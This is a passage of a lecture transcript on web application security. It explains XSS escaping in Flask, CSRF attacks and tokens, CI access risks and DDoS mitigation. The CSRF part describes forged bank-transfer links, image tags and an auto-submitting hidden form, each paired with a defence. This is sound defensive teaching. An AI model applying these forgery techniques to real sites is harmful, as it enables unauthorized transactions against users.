01:04:18,620 and passwords, and now this hacker is able to gain access to that as well. 1434 01:04:18,620 --> 01:04:21,770 And so how do we defend against these sorts of cross-site scripting 1435 01:04:21,770 --> 01:04:23,300 vulnerabilities? 1436 01:04:23,300 --> 01:04:25,370 Well, Flask is actually pretty good about this. 
1437 01:04:25,370 --> 01:04:28,610 And by default, when you're rendering a template, like render template, 1438 01:04:28,610 --> 01:04:32,480 and you're plugging in some information, Flask will, by default, automatically 1439 01:04:32,480 --> 01:04:33,636 escape that stuff for you. 1440 01:04:33,636 --> 01:04:34,760 It will say, you know what? 1441 01:04:34,760 --> 01:04:37,725 This is stuff that could potentially be JavaScript 1442 01:04:37,725 --> 01:04:40,850 or could potentially be unsafe, so we'll go ahead and escape it and protect 1443 01:04:40,850 --> 01:04:41,892 that information for you. 1444 01:04:41,892 --> 01:04:43,683 Certainly not all frameworks are like that, 1445 01:04:43,683 --> 01:04:46,070 and certainly if you're just doing string concatenation 1446 01:04:46,070 --> 01:04:48,170 like we were in the previous example, then that's 1447 01:04:48,170 --> 01:04:50,880 not something we can really rely on. 1448 01:04:50,880 --> 01:04:54,920 But if we take a look at templates index.HTML, 1449 01:04:54,920 --> 01:04:59,060 in order for this to really work the way that I wanted it to, 1450 01:04:59,060 --> 01:05:02,870 I had to add this bar safe in here, where 1451 01:05:02,870 --> 01:05:06,560 this is my way of telling Jinja2, the template rendering engine, 1452 01:05:06,560 --> 01:05:08,060 don't worry about escaping anything. 1453 01:05:08,060 --> 01:05:09,500 Just display the contents. 1454 01:05:09,500 --> 01:05:12,139 And so in reality, if you were to just do message.content, 1455 01:05:12,139 --> 01:05:14,930 Flask would be smart enough to try and defend against this for you. 1456 01:05:14,930 --> 01:05:16,763 But it is something that you just want to be 1457 01:05:16,763 --> 01:05:20,820 careful about anytime you have text that you think is safe, is it really safe? 1458 01:05:20,820 --> 01:05:23,780 Is there a potential for JavaScript code to be injected into there? 
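The difference between the default escaping and marking content as safe can be imitated without a template engine. The sketch below is only a stand-in for what Jinja2 does: `render_messages` and its `safe` flag are hypothetical, and `html.escape` approximates the engine's escaping.

```python
from html import escape


def render_messages(messages: list[str], safe: bool = False) -> str:
    items = []
    for content in messages:
        # safe=True mimics telling the template engine not to escape anything.
        text = content if safe else escape(content)
        items.append(f"<li>{text}</li>")
    return "<ul>" + "".join(items) + "</ul>"


stored = ["foo", "bar", "<script>alert('hi')</script>"]
print(render_messages(stored))             # script shown as harmless text
print(render_messages(stored, safe=True))  # script reaches the browser intact
```

With escaping on, the stored script appears on the page as literal text; with it off, the browser receives a real script tag from the database.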
1459 01:05:23,780 --> 01:05:27,320 And if you're generating the templates yourself by string concatenation 1460 01:05:27,320 --> 01:05:30,770 like we were in the previous example, is there an opportunity for cross-site 1461 01:05:30,770 --> 01:05:33,440 scripting to appear there as well? 1462 01:05:33,440 --> 01:05:37,850 And so that's certainly one of the major vulnerabilities that 1463 01:05:37,850 --> 01:05:42,560 can come about as we start to deal with JavaScript 1464 01:05:42,560 --> 01:05:45,486 and using JavaScript inside of our web applications. 1465 01:05:45,486 --> 01:05:46,360 Questions about that? 1466 01:05:46,360 --> 01:05:49,600 1467 01:05:49,600 --> 01:05:50,350 All right. 1468 01:05:50,350 --> 01:05:52,810 Let's move on and take a look at the next web framework 1469 01:05:52,810 --> 01:05:55,180 that we talked about, which in particular was Django. 1470 01:05:55,180 --> 01:05:56,620 And so when we first took a look at Django, 1471 01:05:56,620 --> 01:05:58,900 we looked at how we would go about doing the same things we 1472 01:05:58,900 --> 01:06:01,540 did in Flask, about rendering templates and displaying pages 1473 01:06:01,540 --> 01:06:04,090 and using server side logic to handle requests. 1474 01:06:04,090 --> 01:06:06,020 And in particular, we looked at forms. 1475 01:06:06,020 --> 01:06:08,681 And when we did look at forms, I had to add a line 1476 01:06:08,681 --> 01:06:10,930 to one of the forms that seemed a little bit strange. 1477 01:06:10,930 --> 01:06:12,580 Does anyone remember what that line was? 1478 01:06:12,580 --> 01:06:13,080 Yes? 1479 01:06:13,080 --> 01:06:14,320 AUDIENCE: CSRF token. 1480 01:06:14,320 --> 01:06:16,690 BRIAN YU: Yeah, we added the CSRF token line to it. 1481 01:06:16,690 --> 01:06:19,630 And I said don't worry about that for now, we'll talk about it later. 1482 01:06:19,630 --> 01:06:22,296 And now is that time that we're going to start talking about it.
1483 01:06:22,296 --> 01:06:25,420 CSRF stands for Cross-Site Request Forgery. 1484 01:06:25,420 --> 01:06:27,910 And this is yet another type of attack that people 1485 01:06:27,910 --> 01:06:30,910 can use where Cross-Site Request Forgery is 1486 01:06:30,910 --> 01:06:35,920 the idea of trying to forge a request to some other website 1487 01:06:35,920 --> 01:06:39,560 in order to take some action there while the user is already logged in. 1488 01:06:39,560 --> 01:06:41,330 And so what might be an example of that? 1489 01:06:41,330 --> 01:06:45,040 Let's say, for instance, that someone was logged into their bank, 1490 01:06:45,040 --> 01:06:46,480 on their bank's website. 1491 01:06:46,480 --> 01:06:49,810 And I, on some other website, wanted to try and trick 1492 01:06:49,810 --> 01:06:53,620 the user into transferring some money to me, for instance. 1493 01:06:53,620 --> 01:06:55,140 How might I go about doing that? 1494 01:06:55,140 --> 01:06:56,890 Well, you might imagine very simply that I 1495 01:06:56,890 --> 01:06:59,181 might start by creating a website, my own website, that 1496 01:06:59,181 --> 01:07:00,790 looks something like this. 1497 01:07:00,790 --> 01:07:04,160 I have the body of my website, I have an a href, a link. 1498 01:07:04,160 --> 01:07:09,610 And this link goes to http://yourbank.com/transfer, 1499 01:07:09,610 --> 01:07:13,240 and then some arguments, some GET parameters, transfer to Brian, amount, 1500 01:07:13,240 --> 01:07:14,920 2,800, for instance. 1501 01:07:14,920 --> 01:07:17,170 And if the bank is set up in such a way, 1502 01:07:17,170 --> 01:07:21,640 where making a GET request to /transfer by passing in as arguments who 1503 01:07:21,640 --> 01:07:25,057 you're transferring to and what the amount is initiates a transfer, 1504 01:07:25,057 --> 01:07:27,640 now I've been able to create a sort of security vulnerability.
1505 01:07:27,640 --> 01:07:30,420 That if this is what's displayed on my page 1506 01:07:30,420 --> 01:07:33,820 and I can convince someone to click here, so long as they're already 1507 01:07:33,820 --> 01:07:37,210 logged in to yourbank.com, then clicking on that link 1508 01:07:37,210 --> 01:07:39,620 automatically will initiate that transfer. 1509 01:07:39,620 --> 01:07:42,250 So if yourbank.com is set up in that way, 1510 01:07:42,250 --> 01:07:45,550 such that transferring money just happens via this GET request, 1511 01:07:45,550 --> 01:07:48,460 then that's certainly a way that I could trick someone 1512 01:07:48,460 --> 01:07:50,350 into transferring money to me. 1513 01:07:50,350 --> 01:07:53,110 What are some ways to protect against that? 1514 01:07:53,110 --> 01:07:58,027 What can yourbank.com do to make sure that we can't do something like this? 1515 01:07:58,027 --> 01:07:59,860 Such that someone else can't just add a link 1516 01:07:59,860 --> 01:08:02,026 that says click here and then automatically initiate 1517 01:08:02,026 --> 01:08:03,010 the transfer of money. 1518 01:08:03,010 --> 01:08:03,210 Yeah? 1519 01:08:03,210 --> 01:08:05,335 AUDIENCE: When you're doing an operation like this, 1520 01:08:05,335 --> 01:08:08,946 you want to send some token with it so it 1521 01:08:08,946 --> 01:08:11,954 knows that it was you that's doing it, and you're not being played. 1522 01:08:11,954 --> 01:08:13,120 BRIAN YU: Great, some token. 1523 01:08:13,120 --> 01:08:17,242 And certainly, we'll see more about that when we get to some more details. 1524 01:08:17,242 --> 01:08:19,700 But right now, this is just a link that you're clicking on. 1525 01:08:19,700 --> 01:08:21,310 So we're just clicking on a link. 1526 01:08:21,310 --> 01:08:23,278 And what else could the bank do? 1527 01:08:23,278 --> 01:08:24,819 But that's certainly one good answer. 
1528 01:08:24,819 --> 01:08:28,691 1529 01:08:28,691 --> 01:08:32,174 AUDIENCE: Not expose a service with a GET request like that. 1530 01:08:32,174 --> 01:08:32,840 BRIAN YU: Great. 1531 01:08:32,840 --> 01:08:34,304 Not expose a GET request like this. 1532 01:08:34,304 --> 01:08:35,720 That could certainly be something. 1533 01:08:35,720 --> 01:08:38,470 And in fact, this is something that's generally good web practice. 1534 01:08:38,470 --> 01:08:42,444 That you don't want GET requests to be modifying the state of something, 1535 01:08:42,444 --> 01:08:44,319 like modifying who has what amounts of money. 1536 01:08:44,319 --> 01:08:47,231 That generally, all of that should be inside of a POST request, such 1537 01:08:47,231 --> 01:08:49,939 that it really needs to be a form submission that needs to happen 1538 01:08:49,939 --> 01:08:52,609 in order to allow that to happen. 1539 01:08:52,609 --> 01:08:54,800 And of course, maybe this isn't such a big deal 1540 01:08:54,800 --> 01:08:57,979 because I'm saying, click here. 1541 01:08:57,979 --> 01:09:01,515 And so as long as the user is smart and as long as they're careful and they 1542 01:09:01,515 --> 01:09:03,890 hover over the link and see, oh, this is going to take me 1543 01:09:03,890 --> 01:09:07,370 to yourbank.com/transfer, then I'm safe. 1544 01:09:07,370 --> 01:09:09,180 So how might a hacker get around that? 1545 01:09:09,180 --> 01:09:11,990 In order to make it such that the user doesn't need to click on, 1546 01:09:11,990 --> 01:09:13,948 click here, in order to initiate that transfer? 1547 01:09:13,948 --> 01:09:18,074 AUDIENCE: They don't need [INAUDIBLE] in other website. 1548 01:09:18,074 --> 01:09:18,740 BRIAN YU: Great. 
1549 01:09:18,740 --> 01:09:22,160 So hypothetically, we could just add some JavaScript code here 1550 01:09:22,160 --> 01:09:25,642 that says that rather than a link that someone needs to click on, 1551 01:09:25,642 --> 01:09:28,100 we'll just add some JavaScript code that will automatically 1552 01:09:28,100 --> 01:09:29,683 redirect the user there, for instance. 1553 01:09:29,683 --> 01:09:32,930 And that could be something that could happen as well. 1554 01:09:32,930 --> 01:09:35,922 But then at minimum, the user is taken to that other web site, 1555 01:09:35,922 --> 01:09:38,130 and now they can see that that transfer has happened. 1556 01:09:38,130 --> 01:09:40,671 But there are even more subtle ways about doing this as well. 1557 01:09:40,671 --> 01:09:42,760 We looked at, in a couple of slides ago, we 1558 01:09:42,760 --> 01:09:45,260 talked about how image tags, for instance, can be used. 1559 01:09:45,260 --> 01:09:48,590 Where if you provide the link to whatever the source of the image is, 1560 01:09:48,590 --> 01:09:51,300 that will automatically trigger a request there as well. 1561 01:09:51,300 --> 01:09:54,740 And so you might imagine that instead of structuring my hacking page like this, 1562 01:09:54,740 --> 01:09:59,360 if I tried this as my exploit instead, just render an image where the source 1563 01:09:59,360 --> 01:10:03,680 of that image is yourbank.com/transfer and here's what I'm transferring. 1564 01:10:03,680 --> 01:10:06,420 Now, no need for a user to click on any link at all. 1565 01:10:06,420 --> 01:10:08,800 As soon as they go to my page, your web browser 1566 01:10:08,800 --> 01:10:11,030 is going to make a request to this URL, and that's 1567 01:10:11,030 --> 01:10:15,410 going to potentially start to initiate a transfer. 1568 01:10:15,410 --> 01:10:18,900 And so that's certainly a potential security vulnerability. 
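[Editor's sketch] The suggestion above, that a GET request should never change state, can be sketched in Python roughly as follows. This is a minimal illustration and not code from the lecture: the `balances` dictionary, the `handle_transfer` function, and the account names are all hypothetical stand-ins for whatever yourbank.com would actually use.

```python
# Hypothetical in-memory account store; a real bank would use a database.
balances = {"alice": 100, "mallory": 0}

# HTTP methods that are expected to be read-only.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def handle_transfer(method, sender, to, amount):
    """Return an (HTTP status, message) pair for a transfer request."""
    if method.upper() in SAFE_METHODS:
        # Links and <img src="..."> tags always issue GET requests,
        # so refusing to change state here defeats those two exploits.
        return 405, "Method Not Allowed"
    if amount <= 0 or to not in balances or balances.get(sender, 0) < amount:
        return 400, "Bad Request"
    balances[sender] -= amount
    balances[to] += amount
    return 200, "OK"
```

With this check in place, the image-tag request is rejected and no money moves. As the lecture goes on to show, requiring POST is not sufficient on its own, because another site can still submit a hidden form.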
1569 01:10:18,900 --> 01:10:21,380 And so someone suggested OK, well, rather 1570 01:10:21,380 --> 01:10:25,250 than make your bank take all of its transfers via GET requests, 1571 01:10:25,250 --> 01:10:27,540 we might instead want to do this via making it a form 1572 01:10:27,540 --> 01:10:29,540 that someone needs to submit, some POST request. 1573 01:10:29,540 --> 01:10:33,050 That it can't just be you clicking on a link or you rendering some image 1574 01:10:33,050 --> 01:10:36,210 that's going to trigger the transfer of funds. 1575 01:10:36,210 --> 01:10:41,330 So maybe you might imagine that I could do something like this. 1576 01:10:41,330 --> 01:10:44,150 This might be an exploit that I can use now on my site. 1577 01:10:44,150 --> 01:10:48,320 That I create a form whose action is yourbank.com/transfer, 1578 01:10:48,320 --> 01:10:51,680 the method is POST, and now I have these hidden input type, 1579 01:10:51,680 --> 01:10:53,150 input type equals hidden. 1580 01:10:53,150 --> 01:10:55,950 This is an input type that's just not going to appear to the user. 1581 01:10:55,950 --> 01:10:57,720 The user is not going to see this at all. 1582 01:10:57,720 --> 01:11:01,826 It's an input type named to, whose value is who I want to transfer the money to. 1583 01:11:01,826 --> 01:11:04,700 I have an input type that is the amount, which is the amount of money 1584 01:11:04,700 --> 01:11:06,410 that I want to transfer. 1585 01:11:06,410 --> 01:11:08,870 And then I have an input type called submit, 1586 01:11:08,870 --> 01:11:11,900 which is just going to be a button that says click here. 1587 01:11:11,900 --> 01:11:16,430 And so all the user is going to see, if this code is rendered, is what? 1588 01:11:16,430 --> 01:11:18,090 What does the user see? 1589 01:11:18,090 --> 01:11:19,000 AUDIENCE: Click here. 1590 01:11:19,000 --> 01:11:19,490 BRIAN YU: Exactly. 
1591 01:11:19,490 --> 01:11:21,448 They just see this one input field, this button 1592 01:11:21,448 --> 01:11:24,320 that says click here, because these two input fields are hidden. 1593 01:11:24,320 --> 01:11:26,194 And of course, click here could say anything. 1594 01:11:26,194 --> 01:11:28,116 It could say next page, for instance. 1595 01:11:28,116 --> 01:11:30,740 Something benign that looks like something you might reasonably 1596 01:11:30,740 --> 01:11:32,656 just click that would take you somewhere else, 1597 01:11:32,656 --> 01:11:35,960 when in reality, it's submitting a form that's going to transfer funds 1598 01:11:35,960 --> 01:11:38,180 to someone and to some amount. 1599 01:11:38,180 --> 01:11:41,010 But of course, maybe we're OK because if the user is careful 1600 01:11:41,010 --> 01:11:43,310 and they're not going to click on the button, then-- 1601 01:11:43,310 --> 01:11:44,480 and then if they're not clicking on a button 1602 01:11:44,480 --> 01:11:47,438 when they don't know what that button actually does, then they're safe. 1603 01:11:47,438 --> 01:11:52,970 How might a hacker still get around this and still be able to get the user 1604 01:11:52,970 --> 01:11:54,669 to submit this form? 1605 01:11:54,669 --> 01:11:56,460 Even without the user clicking on a button. 1606 01:11:56,460 --> 01:12:01,421 1607 01:12:01,421 --> 01:12:01,920 Yeah? 1608 01:12:01,920 --> 01:12:05,185 AUDIENCE: Can you do a POST request from JavaScript code? 1609 01:12:05,185 --> 01:12:07,560 BRIAN YU: Can you do a POST request from JavaScript code? 1610 01:12:07,560 --> 01:12:08,739 Certainly you can. 1611 01:12:08,739 --> 01:12:10,530 We actually looked at ways we could do that 1612 01:12:10,530 --> 01:12:14,561 before when we were talking about AJAX and making requests to a server 1613 01:12:14,561 --> 01:12:16,560 in order to get more information from the server 1614 01:12:16,560 --> 01:12:18,660 after we've already loaded the page.
1615 01:12:18,660 --> 01:12:20,542 So that's certainly one option as well. 1616 01:12:20,542 --> 01:12:23,250 Another way we could do it is just by adding this additional line 1617 01:12:23,250 --> 01:12:26,130 to the body, onload-- when you're done loading-- 1618 01:12:26,130 --> 01:12:27,890 here's what the body should do. 1619 01:12:27,890 --> 01:12:32,220 document.forms[0], get the first form in the document and submit it. 1620 01:12:32,220 --> 01:12:34,410 Just by adding that single line of JavaScript code, 1621 01:12:34,410 --> 01:12:38,080 now as soon as the user loads this page, this form will be submitted, 1622 01:12:38,080 --> 01:12:42,972 and then that will initiate the transfer at yourbank.com. 1623 01:12:42,972 --> 01:12:46,830 So certainly, this isn't a good scenario we want to be in. 1624 01:12:46,830 --> 01:12:49,620 This is CSRF, Cross-Site Request Forgery, 1625 01:12:49,620 --> 01:12:54,540 where we are able to create a request to some other site 1626 01:12:54,540 --> 01:12:57,690 and pretend that request was originally from yourbank.com in order 1627 01:12:57,690 --> 01:12:59,040 to initiate the transfer. 1628 01:12:59,040 --> 01:13:02,160 And so long as I know what parameters that request takes, 1629 01:13:02,160 --> 01:13:03,874 I'm able to forge that request. 1630 01:13:03,874 --> 01:13:05,790 And so the solution, as was pointed out, which 1631 01:13:05,790 --> 01:13:08,910 is what Django uses and a bunch of other web frameworks use, 1632 01:13:08,910 --> 01:13:11,880 is to add a special token, effectively a password.
1633 01:13:11,880 --> 01:13:16,260 Where the idea is that you would write this inside of your Django code, 1634 01:13:16,260 --> 01:13:19,800 and if you were to look at the HTML that gets rendered as a result, what's 1635 01:13:19,800 --> 01:13:23,790 actually happening is that in place of CSRF token, 1636 01:13:23,790 --> 01:13:26,460 the web server, the Django web server, is 1637 01:13:26,460 --> 01:13:30,390 inserting some long string, some effectively a token or a password, 1638 01:13:30,390 --> 01:13:32,850 that is associated with this specific form. 1639 01:13:32,850 --> 01:13:35,220 Such that when the user submits that form, 1640 01:13:35,220 --> 01:13:37,140 the token is submitted along with it. 1641 01:13:37,140 --> 01:13:40,200 And the server can then check to see does this token match 1642 01:13:40,200 --> 01:13:41,700 the token that I initially sent out. 1643 01:13:41,700 --> 01:13:44,460 And only, if and only if they match, then we're 1644 01:13:44,460 --> 01:13:46,290 going to actually initiate the transfer. 1645 01:13:46,290 --> 01:13:50,880 That way, no other website is able to forge a request to my bank's transfer 1646 01:13:50,880 --> 01:13:53,610 web site because they're not going to know what the token is. 1647 01:13:53,610 --> 01:13:56,070 It's going to be a new token every time we make a request, 1648 01:13:56,070 --> 01:14:01,080 and that's going to allow us to avoid a situation where someone might be able 1649 01:14:01,080 --> 01:14:02,670 to-- from some other site-- 1650 01:14:02,670 --> 01:14:08,520 make a request that attacks the /transfer route in this case. 1651 01:14:08,520 --> 01:14:11,112 So that's why Django has that CSRF token in place. 1652 01:14:11,112 --> 01:14:13,070 It's to prevent against those kinds of attacks. 
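[Editor's sketch] The token check described above can be sketched in plain Python roughly as follows. This is a simplified illustration of the general idea and not Django's actual implementation: the `session` dictionary and the function names `issue_csrf_token` and `is_valid_csrf_token` are assumptions made for the example.

```python
import hmac
import secrets


def issue_csrf_token(session):
    """Create an unguessable token, remember it in the user's session,
    and return it so it can be embedded in a hidden form field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_valid_csrf_token(session, submitted):
    """Return True only if the submitted token matches the one issued."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # compare_digest runs in constant time, which avoids leaking how
    # many leading characters of a guess were correct.
    return hmac.compare_digest(expected.encode(), submitted.encode())
```

A page on another site can still submit a form to the /transfer route, but it has no way to read the token stored in the victim's session, so the check fails and the transfer is refused.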
1653 01:14:13,070 --> 01:14:16,350 Flask on its own doesn't, by default, have this sort of protection built in, 1654 01:14:16,350 --> 01:14:19,830 although there are extensions that allow you to add on to a Flask 1655 01:14:19,830 --> 01:14:24,120 in order to help add security for this particular type of attack 1656 01:14:24,120 --> 01:14:25,607 into Flask as well. 1657 01:14:25,607 --> 01:14:27,690 So these are also just good things to be aware of, 1658 01:14:27,690 --> 01:14:29,795 potential security vulnerabilities that can exist, 1659 01:14:29,795 --> 01:14:32,670 and things you'll want to think about as you design your application. 1660 01:14:32,670 --> 01:14:36,660 Can just anyone initiate a transfer request by submitting a POST request 1661 01:14:36,660 --> 01:14:39,570 or do they need some special tokens, potentially changing, 1662 01:14:39,570 --> 01:14:42,670 as they go about doing that as well. 1663 01:14:42,670 --> 01:14:44,843 Questions about the security vulnerabilities 1664 01:14:44,843 --> 01:14:48,300 we've talked about so far? 1665 01:14:48,300 --> 01:14:48,970 OK. 1666 01:14:48,970 --> 01:14:53,140 Let's go ahead and move on from Django and talk a little bit about CI/CD. 1667 01:14:53,140 --> 01:14:55,090 And so this is relatively recent, where we 1668 01:14:55,090 --> 01:14:58,690 were talking about how we might leverage CI tools, 1669 01:14:58,690 --> 01:15:01,210 where we looked at Travis in particular, as a tool that we 1670 01:15:01,210 --> 01:15:04,630 can use in order to run tests in order to deploy our code. 1671 01:15:04,630 --> 01:15:07,060 And we connected Travis to GitHub, whereby 1672 01:15:07,060 --> 01:15:11,200 Travis was able to run tests on our GitHub code inside of our repositories 1673 01:15:11,200 --> 01:15:14,680 and then check to make sure that those tests, in fact, passed. 1674 01:15:14,680 --> 01:15:17,770 What vulnerabilities appear there? 
1675 01:15:17,770 --> 01:15:20,030 Or are things that we should be considering 1676 01:15:20,030 --> 01:15:21,620 when we start to think about that? 1677 01:15:21,620 --> 01:15:22,120 Yeah? 1678 01:15:22,120 --> 01:15:24,430 AUDIENCE: You're giving Travis access to your codebase. 1679 01:15:24,430 --> 01:15:25,060 BRIAN YU: Yeah, exactly. 1680 01:15:25,060 --> 01:15:27,230 We're now giving Travis access to our codebase. 1681 01:15:27,230 --> 01:15:31,280 So whereas before, our code was stored on GitHub and GitHub alone, 1682 01:15:31,280 --> 01:15:33,280 such that, certainly, if GitHub was compromised, 1683 01:15:33,280 --> 01:15:35,480 now our code is compromised as well. 1684 01:15:35,480 --> 01:15:39,310 Now we've given Travis access to all of our private repositories 1685 01:15:39,310 --> 01:15:41,620 on GitHub potentially, such that now there 1686 01:15:41,620 --> 01:15:43,609 are two points at which being compromised 1687 01:15:43,609 --> 01:15:45,400 could result in our code being compromised. 1688 01:15:45,400 --> 01:15:48,280 Whereby if GitHub is compromised, our code is compromised. 1689 01:15:48,280 --> 01:15:51,281 But likewise, if Travis is compromised for some security reason, 1690 01:15:51,281 --> 01:15:53,530 then our code might also be compromised because Travis 1691 01:15:53,530 --> 01:15:56,260 has access to our GitHub account. 1692 01:15:56,260 --> 01:15:58,540 And so any time you deal with accounts that 1693 01:15:58,540 --> 01:16:02,319 are able to grant permission to other applications or other accounts 1694 01:16:02,319 --> 01:16:05,110 to get access to that information, that's where there's potentially 1695 01:16:05,110 --> 01:16:06,860 room for security vulnerabilities. 1696 01:16:06,860 --> 01:16:09,120 And so we see that with GitHub, where GitHub 1697 01:16:09,120 --> 01:16:11,680 is allowed to authorize other applications if you give them 1698 01:16:11,680 --> 01:16:14,080 permission to have access to your information as well. 
1699 01:16:14,080 --> 01:16:15,871 But you see this in other websites as well. 1700 01:16:15,871 --> 01:16:18,850 In fact, Facebook does this, and has been under controversy recently, 1701 01:16:18,850 --> 01:16:23,470 for the idea that it can grant third-party applications the right 1702 01:16:23,470 --> 01:16:25,120 to look at your user information. 1703 01:16:25,120 --> 01:16:27,370 And if you grant a third-party application that right, 1704 01:16:27,370 --> 01:16:30,190 now if any one of those is compromised, then your own user information 1705 01:16:30,190 --> 01:16:30,815 is compromised. 1706 01:16:30,815 --> 01:16:32,890 And so it's the same type of thing, where 1707 01:16:32,890 --> 01:16:37,120 you want to be careful about if you're giving access to one website, 1708 01:16:37,120 --> 01:16:39,460 giving one website access to your user information 1709 01:16:39,460 --> 01:16:44,050 or your code and your repositories, then what other services also 1710 01:16:44,050 --> 01:16:46,641 have the same access to that information as well. 1711 01:16:46,641 --> 01:16:48,640 And so if you're the one designing the services, 1712 01:16:48,640 --> 01:16:51,820 you want to be careful about what other services you give access to. 1713 01:16:51,820 --> 01:16:53,710 And if you're the one using GitHub or Travis, 1714 01:16:53,710 --> 01:16:56,980 you also want to be careful about how many different third-party 1715 01:16:56,980 --> 01:17:02,670 services have access to all of your private repositories for example.
1716 01:17:02,670 --> 01:17:05,860 And so as a final example, as we move on to, just recently 1717 01:17:05,860 --> 01:17:08,200 last week, in terms of the topics we were talking about, 1718 01:17:08,200 --> 01:17:11,050 we talked a little bit about scalability and the idea 1719 01:17:11,050 --> 01:17:13,960 that once we've written our application and we're ready to deploy it, 1720 01:17:13,960 --> 01:17:17,417 we need to think about how we're going to scale this application as more 1721 01:17:17,417 --> 01:17:19,000 and more users start using it. 1722 01:17:19,000 --> 01:17:22,600 We talked about load balancers and having multiple different servers. 1723 01:17:22,600 --> 01:17:26,050 And we talked about, in particular, that any server 1724 01:17:26,050 --> 01:17:29,984 is a finite machine that can only handle a certain number of requests 1725 01:17:29,984 --> 01:17:31,150 in a certain amount of time. 1726 01:17:31,150 --> 01:17:34,720 Maybe x requests per second for instance, where x is some number. 1727 01:17:34,720 --> 01:17:39,160 And what potential vulnerabilities or exploits come about there? 1728 01:17:39,160 --> 01:17:41,140 What could a potentially malicious hacker 1729 01:17:41,140 --> 01:17:46,184 try to do knowing the constraints of what our systems are capable of? 1730 01:17:46,184 --> 01:17:50,056 AUDIENCE: Like [INAUDIBLE] can start DDoSing your system, 1731 01:17:50,056 --> 01:17:52,000 sending a bunch of requests at the same time. 1732 01:17:52,000 --> 01:17:52,480 BRIAN YU: Exactly. 1733 01:17:52,480 --> 01:17:53,646 Sending a bunch of requests.
1734 01:17:53,646 --> 01:17:57,620 So if a computer, for instance, is going to-- if our server, for instance, 1735 01:17:57,620 --> 01:18:02,046 can only handle 1,000 requests per second, and one hacker, 1736 01:18:02,046 --> 01:18:05,170 on their computer, decides that they want to try and shut down our system-- 1737 01:18:05,170 --> 01:18:07,840 maybe they're going to send 1,001 requests in a single second 1738 01:18:07,840 --> 01:18:08,800 to our server. 1739 01:18:08,800 --> 01:18:12,895 And this is what we'll generally call a DoS, or denial-of-service attack, 1740 01:18:12,895 --> 01:18:17,440 where a user tries to send request after request after request 1741 01:18:17,440 --> 01:18:19,390 in an attempt to overload our servers in order 1742 01:18:19,390 --> 01:18:22,330 to try and make sure that we're unable to handle all the requests that 1743 01:18:22,330 --> 01:18:22,913 are coming in. 1744 01:18:22,913 --> 01:18:26,070 And if we're handling all of the requests coming in from one user, 1745 01:18:26,070 --> 01:18:29,080 then we're potentially not able to handle requests 1746 01:18:29,080 --> 01:18:31,900 coming from other people as well. 1747 01:18:31,900 --> 01:18:34,450 Of course, this probably isn't too much of an issue 1748 01:18:34,450 --> 01:18:38,050 if we've got dozens and dozens of servers 1749 01:18:38,050 --> 01:18:41,020 and only one computer is the one making a lot of requests. 1750 01:18:41,020 --> 01:18:42,790 Which is why the next thing you mentioned 1751 01:18:42,790 --> 01:18:45,950 was also a potential exploit or a potential concern, 1752 01:18:45,950 --> 01:18:50,140 which is that what if it's not just one single computer, but a whole botnet 1753 01:18:50,140 --> 01:18:54,550 of a bunch of computers that are all trying to make requests to the same web 1754 01:18:54,550 --> 01:18:55,900 server at the same time?
1755 01:18:55,900 --> 01:18:57,820 This is what we generally call a DDoS attack, 1756 01:18:57,820 --> 01:18:59,980 a Distributed denial-of-service attack, where 1757 01:18:59,980 --> 01:19:01,840 we have a lot of different computers that 1758 01:19:01,840 --> 01:19:05,510 are all trying to make requests at the same time to our same web application. 1759 01:19:05,510 --> 01:19:07,990 And as a result, it's quite likely that the web application 1760 01:19:07,990 --> 01:19:11,120 might be overloaded by all these requests and be unable to handle it. 1761 01:19:11,120 --> 01:19:15,037 And so what are ways of potentially dealing with a DDoS attack? 1762 01:19:15,037 --> 01:19:17,620 Of a bunch of people trying to make requests at the same time, 1763 01:19:17,620 --> 01:19:22,071 trying to shut down our server by overloading it with too many requests? 1764 01:19:22,071 --> 01:19:22,570 Yeah. 1765 01:19:22,570 --> 01:19:24,400 AUDIENCE: Limit how many requests they can make. 1766 01:19:24,400 --> 01:19:25,790 BRIAN YU: Try and limit how many requests they can make. 1767 01:19:25,790 --> 01:19:27,760 So certainly one potential approach to dealing 1768 01:19:27,760 --> 01:19:31,540 with DDoS attacks is to try and add some sort of filtering system of trying 1769 01:19:31,540 --> 01:19:34,470 to-- before it actually gets to the server, try and filter and see 1770 01:19:34,470 --> 01:19:35,770 is this a valid request or not? 1771 01:19:35,770 --> 01:19:37,965 And maybe there are heuristics you can use for that. 1772 01:19:37,965 --> 01:19:40,090 And certainly, if you can limit people, that if you 1773 01:19:40,090 --> 01:19:43,540 notice that this particular computer is making a lot of requests 1774 01:19:43,540 --> 01:19:45,880 at the same time or in a short amount of time, then 1775 01:19:45,880 --> 01:19:47,671 maybe you can put downward pressure on that 1776 01:19:47,671 --> 01:19:49,380 by blacklisting that particular user. 
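[Editor's sketch] The idea above, noticing that one computer is making many requests in a short amount of time and limiting it, can be sketched in Python as a sliding-window rate limiter. This is a minimal single-process illustration under assumed names: `RateLimiter`, `allow`, and the `client_id` key (for example an IP address) are hypothetical, and a real deployment would more likely enforce such limits at a proxy or load balancer in front of the application.

```python
from collections import defaultdict, deque


class RateLimiter:
    """Allow at most max_requests per client within window_seconds."""

    def __init__(self, max_requests, window_seconds):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        # Maps each client to the timestamps of its recent requests.
        self._hits = defaultdict(deque)

    def allow(self, client_id, now):
        """Return True if a request from client_id at time `now`
        (in seconds) is within the limit, and record it if so."""
        hits = self._hits[client_id]
        # Discard timestamps that have fallen out of the window.
        while hits and now - hits[0] >= self.window_seconds:
            hits.popleft()
        if len(hits) >= self.max_requests:
            return False
        hits.append(now)
        return True
```

In use, `now` would typically come from `time.monotonic()`. Passing it in explicitly keeps the sketch easy to test. A per-client limit like this helps against a single noisy machine, but it does much less against a botnet, where each machine can stay under the limit.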
